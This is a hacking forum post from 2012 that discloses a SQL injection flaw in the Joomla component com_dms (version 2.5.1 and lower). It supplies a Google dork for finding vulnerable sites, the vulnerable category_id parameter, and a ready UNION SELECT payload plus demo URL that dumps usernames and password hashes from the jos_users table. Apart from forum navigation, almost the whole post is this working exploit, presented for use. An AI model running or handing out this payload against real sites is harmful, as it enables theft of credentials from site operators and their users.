.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Joomla Component com_dms Remote SQL injection vulnerability - (category_id)

Go down 
PengirimMessage
0day
Trainee
Trainee
0day


Jumlah posting : 83
Points : 202
Reputation : 7
Join date : 22.08.11

Joomla Component com_dms Remote SQL injection vulnerability - (category_id) Empty
PostSubyek: Joomla Component com_dms Remote SQL injection vulnerability - (category_id)   Joomla Component com_dms Remote SQL injection vulnerability - (category_id) Icon_minitimeThu Jun 14, 2012 7:03 pm

*************************************************************************/



[ Software Information ]



[+] Vendor : http://joomdonation.com/

[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40

[+] version : 2.5.1 or lower maybe also affected

[+] Vulnerability : SQL injection

[+] Dork : inurl:"com_dms"

[+] Type : commercial

===========================================================================



[ Vulnerable File ]



http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]



[ Exploit ]



-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--



[ Demo ]



http://server/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

=========================================================================
Kembali Ke Atas Go down
 
Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Joomla component (com_easyfaq) SQL injection vulnerability
» Joomla Component Jobprofile SQL Injection Vulnerability
» Joomla Component Jobprofile SQL Injection Vulnerability
» Joomla Component com_sar_news SQL Injection vulnerability
» OpenX (phpAdsNew) Remote File inclusion Vulnerability

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: